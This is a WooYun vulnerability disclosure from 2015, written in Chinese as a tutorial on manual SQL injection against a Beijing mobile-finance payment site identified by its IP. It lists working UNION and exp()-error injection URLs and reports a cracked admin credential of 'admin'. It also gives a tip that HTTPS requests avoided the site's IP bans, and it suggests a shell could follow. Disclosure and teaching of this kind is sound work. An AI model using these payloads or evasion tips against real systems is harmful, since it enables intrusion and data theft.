当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141179

漏洞标题:北京微金移动金融sql注入(手注科普实例)

相关厂商:北京微金汇通科技有限公司

漏洞作者: j1ang_y0u

提交时间:2015-09-15 08:43

修复时间:2015-10-30 08:44

公开时间:2015-10-30 08:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

码字辛苦,rank给高点呗

详细说明:

网站一扫描ip就被封,只好手注,不是为了装逼。。。。还发现手注注入多次也会被封,但是网站还开启了443端口,然后发现注入https的连接不易被封
注入点

https://42.121.52.97/pay/news.php?id=646


0x1 union注入
确定字段数目,9是试出来的,<=9都正常,为10就报错,说明字段数目为9

https://42.121.52.97/pay/news.php?id=646 order by 9#


查看那些字段会显示在页面上,以便下一步的探测

https://42.121.52.97/pay/news.php?id=-1 union select 1,2,3,4,5,6,7,8,9#


image001.png


第3,4,6字段会显示在页面上,我们就可以利用三个字段爆其他数据
利用第3个字段爆版本和数据库

https://42.121.52.97/pay/news.php?id=-1 union select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables where table_schema=0x76676F6C64706179#


image003.png


一次性爆所有表

https://42.121.52.97/pay/news.php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x76676F6C64706179#


image005.png


爆字段

image009.png


admin用户 md5密码21232f297a57a5a743894a0e4a801fc3解出来就是尼玛 admin,弱口令有木有。。
0x2 报错手注
由于本网站也开启报错,我们可以更方便的报错注入,报错注入也有几种,最早的floor报错,然后updatexml,extractvalue,还有exp函数报错,最近wooyun知识库也有分享基于bigint溢出的报错注入,这里以exp函数报错为例子。
爆用户,版本,数据库

https://42.121.52.97/pay/news.php?id=646 and exp(~(select * from(select group_concat(user(),0x3a,version(),0x3a,database()))x))#


image011.png


爆表

image013.png


爆vgoldpay_admin所有的列名

image015.png


爆字段

image017.png


报错注入更方便直接
通过注入获取账号密码,就可以登录后台getshell,但是没拿,因为后面还有更精彩的拿shell方法~~

漏洞证明:

同上

修复方案:

一点过滤都没,过滤参数,关闭错误提示
写个安全类,都调用这个类来操作数据库
装个防注入的waf等。。。
更改弱口令

版权声明:转载请注明来源 j1ang_y0u@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论